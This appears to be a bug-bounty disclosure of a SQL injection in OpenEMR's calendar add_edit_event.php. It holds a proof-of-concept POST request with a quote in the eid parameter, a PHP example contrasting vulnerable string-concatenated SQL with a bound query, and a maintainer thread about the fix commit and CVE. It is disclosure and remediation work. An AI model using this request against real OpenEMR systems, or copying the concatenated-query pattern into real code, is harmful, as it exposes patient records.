SQL injection in the delete action of the file add_edit_event.php in openemr/openemr

Valid

Reported on

Apr 30th 2023


Description

We have discovered that the SQL injection vulnerability can be exploited through the file /interface/main/calendar/add_edit_event.php, allowing an attacker to manipulate the query via the eid parameter, provided that the Support Multi-Provider Events feature is enabled.

Proof of Concept

REQUEST:

POST /openemr/interface/main/calendar/add_edit_event.php?eid=1' HTTP/1.1
Host: localhost:8888
Content-Length: 75
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: OpenEMR=uqIwdZamDUi602vL9TYGfvL6lrf1Pun7PZlxnFoIcLsDkOGO
Connection: close

csrf_token_form=5f89af4268e0b669fbaf22fe3627e880290f6d46&form_action=delete

Evidence

Impact

An attacker can modify the query and get all the data in the database.
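
The general pattern the report describes, as an added example that is not part of the original report and is not OpenEMR's code: a request value concatenated into a DELETE statement, next to a validated and parameterized version. The `events` table, its columns and the function names are hypothetical, and PDO with in-memory SQLite stands in for the application's database layer.

```php
<?php
declare(strict_types=1);

// Constructed stand-in data: an in-memory SQLite table with hypothetical names.
function makeDb(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE events (eid INTEGER PRIMARY KEY, title TEXT)');
    $db->exec("INSERT INTO events (eid, title) VALUES (1, 'checkup'), (2, 'follow-up')");
    return $db;
}

// Vulnerable pattern: the request value is concatenated into the SQL text,
// so a quote in it changes the structure of the statement.
function deleteEventConcatenated(PDO $db, string $eid): int
{
    return (int) $db->exec("DELETE FROM events WHERE eid = '" . $eid . "'");
}

// Hardened pattern: reject anything that is not digits, then bind the value
// so the driver always treats it as data and never as SQL text.
function deleteEventBound(PDO $db, string $eid): int
{
    if (!ctype_digit($eid)) {
        throw new InvalidArgumentException('eid must contain digits only');
    }
    $stmt = $db->prepare('DELETE FROM events WHERE eid = ?');
    $stmt->execute([(int) $eid]);
    return $stmt->rowCount();
}

$eid = "1'"; // the eid value from the request shown above
$db = makeDb();

try {
    deleteEventConcatenated($db, $eid);
} catch (PDOException $e) {
    // The stray quote reached the SQL parser: the input is being parsed as SQL.
    echo "concatenated: SQL error\n";
}

try {
    deleteEventBound($db, $eid);
} catch (InvalidArgumentException $e) {
    echo "bound: rejected before any query ran\n";
}

echo "bound, valid id: ", deleteEventBound($db, '1'), " row deleted\n";
```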

We are processing your report and will contact the openemr team within 24 hours. 5 months ago
We have contacted a member of the openemr team and are waiting to hear back 5 months ago
stephen waite validated this vulnerability 5 months ago

Thanks @Nhien.IT, have a fix in progress.

Nhien.IT has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Nhien.IT
5 months ago

Researcher


Hi @stephenwaite,

Thank you for confirming this report. If you don't mind, can you assign the CVE ID for this vulnerability? Because I need it for my work.

stephen waite gave praise 5 months ago
Hi @Nhien.IT, this is fixed in https://github.com/openemr/openemr/commit/391f2f98cbd6faa30bfdffb80af1461fc55a10a5 but we are unable to mark this as fixed, since that requires hard-setting a publish date, which I am unable to safely predict. We plan to release OpenEMR 7.0.1 patch 1 in about 1-3 weeks, which will include this fix. At that time (after the release of OpenEMR 7.0.1), we will then mark this issue as fixed (and publish at that time with a CVE). Thanks again for the report!
The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1
Nhien.IT
4 months ago

Researcher


Hi @maintainer,

any update here?

Nhien.IT
3 months ago

Researcher


Hi @maintainer @admin,

Any update here????? I just received an email that OpenEMR 7.0.1 Patch 1 has been released!!

Regards

Ben Harvie
3 months ago

Admin


Hi Nhien.IT, if you have the patch commit SHA and fixed version, we can manually mark this as fixed. We will require maintainer confirmation for a CVE to be assigned and published however. Thanks!

Nhien.IT
3 months ago

Researcher


Hi @admin,

The patch is committed at https://github.com/openemr/openemr/commit/391f2f98cbd6faa30bfdffb80af1461fc55a10a5 and I have received an email about the OpenEMR 7.0.1 patch.

Thanks

Nhien.IT
3 months ago

Researcher


Hi @admin @maintainer,

Any new updates here? It's been quite a while since the patch was announced and I haven't received a response from @maintainer. Hope @admin can help!!!!

Thanks

Ben Harvie marked this as fixed in master with commit 391f2f 2 months ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
Ben Harvie published this vulnerability 2 months ago
add_edit_event.php#L780 has been validated